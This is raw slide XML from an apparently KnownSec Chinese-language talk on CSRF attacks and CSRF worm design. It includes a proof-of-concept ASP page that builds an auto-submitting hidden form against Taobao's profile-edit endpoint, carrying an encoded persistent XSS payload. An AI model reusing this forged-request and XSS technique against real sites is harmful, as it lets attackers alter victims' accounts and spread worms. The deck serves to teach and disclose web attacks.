              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67587" name="Picture 2" descr="D:\KnownSec\rar-1.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="857250" y="1638300"/>
            <a:ext cx="7419975"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基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>的攻击</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68611" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>注入攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的命令执行攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>需要权限验证的漏洞可以使用基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的攻击手法。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>经常被忽略的安全问题。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>的攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>实例</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69635" name="Picture 2" descr="D:\KnownSec\taobao-0.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="857250" y="2295525"/>
            <a:ext cx="7343775" cy="3848100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69636" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="785813" y="1643063"/>
            <a:ext cx="7429500" cy="646112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>被攻击者登录自己的淘宝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>http://my.taobao.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>。在“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>编辑个人信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>”处存在持久型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>漏洞。</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基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>的攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>实例</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70659" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="785813" y="1643063"/>
            <a:ext cx="7429500" cy="646112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>他同时访问了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>http://xeye.us/lab/x_taobao_csrf.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>。随后发生了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="70660" name="Picture 2" descr="D:\KnownSec\taobao-1.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="871538" y="2286000"/>
            <a:ext cx="7343775"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基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>的攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>实例</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" smtClean="0"/>
              <a:t>http://xeye.us/lab/x_taobao_csrf.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2900" smtClean="0"/>
              <a:t>的部分代码如下：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2900" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" smtClean="0"/>
              <a:t>&lt;%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" smtClean="0"/>
              <a:t>s = "&lt;form method='post' action='http://member1.taobao.com/member/edit_user_info.jhtml'&gt;“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" smtClean="0"/>
              <a:t>……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" smtClean="0"/>
              <a:t>s = s+"&lt;input type='text' style='display:none!important;display:block;width=0;height=0' value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;#x706b;&amp;#x661f;&amp;#x0022; onmouseover=&amp;#x22;alert(/hi/.source)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" smtClean="0"/>
              <a:t>name='_fmm.edi._0.a'/&gt;“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" smtClean="0"/>
              <a:t>……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" smtClean="0"/>
              <a:t>s = s+"&lt;/form&gt;"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" smtClean="0"/>
              <a:t>s = s+"&lt;script&gt;document.forms[0].submit();&lt;/script&gt;"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" smtClean="0"/>
              <a:t>Response.write(s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" smtClean="0"/>
              <a:t>%&gt;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2214563" y="2868613"/>
            <a:ext cx="4643437" cy="1000125"/>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2400"/>
              <a:t>三、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>蠕虫模型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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蠕虫模型</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="5214938"/>
            <a:ext cx="4929188" cy="642937"/>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anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>蠕虫数据处理中心</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="2214563"/>
            <a:ext cx="4929188" cy="714375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>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altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web2.0——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>具有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="4572000"/>
            <a:ext cx="3071813" cy="500063"/>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1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>数据获取模块</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5500688" y="4572000"/>
            <a:ext cx="1714500" cy="500063"/>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600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>数据发送模块</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="圆角矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1214438" y="3857625"/>
            <a:ext cx="642937" cy="357188"/>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400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="圆角矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="214313" y="4286250"/>
            <a:ext cx="1643062" cy="357188"/>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1400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>服务端代理技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="圆角矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="4714875"/>
            <a:ext cx="1428750" cy="357188"/>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400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>JSON Hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="圆角矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="214313" y="5143500"/>
            <a:ext cx="1643062" cy="5000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400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(crossdomain.xml)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="直接连接符 12"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1857375" y="4037013"/>
            <a:ext cx="428625" cy="53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3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1857375" y="4465638"/>
            <a:ext cx="428625" cy="24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3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1857375" y="4894263"/>
            <a:ext cx="428625" cy="3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3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1857375" y="5072063"/>
            <a:ext cx="428625" cy="322262"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>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500938" y="4143375"/>
            <a:ext cx="1500187" cy="357188"/>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400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>POST(form/flash)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="圆角矩形 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7500938" y="4572000"/>
            <a:ext cx="857250" cy="357188"/>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400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>GET(url)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="直接连接符 18"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="7215188" y="4322763"/>
            <a:ext cx="285750" cy="24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8" idx="1"/>
            <a:endCxn id="8" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="7215188" y="4751388"/>
            <a:ext cx="285750" cy="714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下箭头 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143250" y="3071813"/>
            <a:ext cx="285750" cy="1428750"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="65000"/>
              <a:lumOff val="3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200" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="下箭头 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6215063" y="3071813"/>
            <a:ext cx="285750" cy="1428750"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="60000"/>
              <a:lumOff val="4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200" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73749" name="TextBox 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3311525" y="3643313"/>
            <a:ext cx="903288" cy="307975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1"/>
              <a:t>唯一标识</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1</a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>、数据获取模块</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
